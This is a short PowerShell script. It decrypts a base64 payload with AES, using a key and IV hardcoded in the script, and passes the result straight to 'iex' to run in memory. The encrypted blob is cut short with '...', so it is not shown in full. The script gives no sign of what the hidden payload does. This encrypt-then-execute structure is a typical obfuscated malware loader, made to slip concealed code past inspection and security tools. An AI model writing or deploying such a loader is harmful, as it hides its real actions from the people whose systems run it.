function D {
    param($e, $k, $i)
    $a = [System.Security.Cryptography.Aes]::Create()
    $a.Key = $k
    $a.IV = $i
    $a.Padding = "PKCS7"
    $d = $a.CreateDecryptor()
    $b = [Convert]::FromBase64String($e)
    $m = New-Object IO.MemoryStream
    $c = New-Object Security.Cryptography.CryptoStream($m, $d, 'Write')
    $c.Write($b, 0, $b.Length)
    $c.Close()
    [Text.Encoding]::UTF8.GetString($m.ToArray())
}

$k = [Convert]::FromBase64String("MWLR/AnZl1Hcjyfe5DgD43LdgkQtVISS28mCeNuRi9Q=")
$i = [Convert]::FromBase64String("JIEvxYrJ4H/jObIrU3Ba9g==")
$p = @"
+LviCQGCOUqt7TLTIEpsVZMh9kEgXxLQrLR9kiHZilQXfOXkiGv7m0jaNdUmjHbOrYtKTBcuaelEGQ3w
2dUd09WsciqouXylWvJG/NYL7rk/nXFD7FbrB/w7eBhaFHDg5VPz5DJc36dInEC2cdmlertrz8iXMfta
...
"@

iex (D $p $k $i)
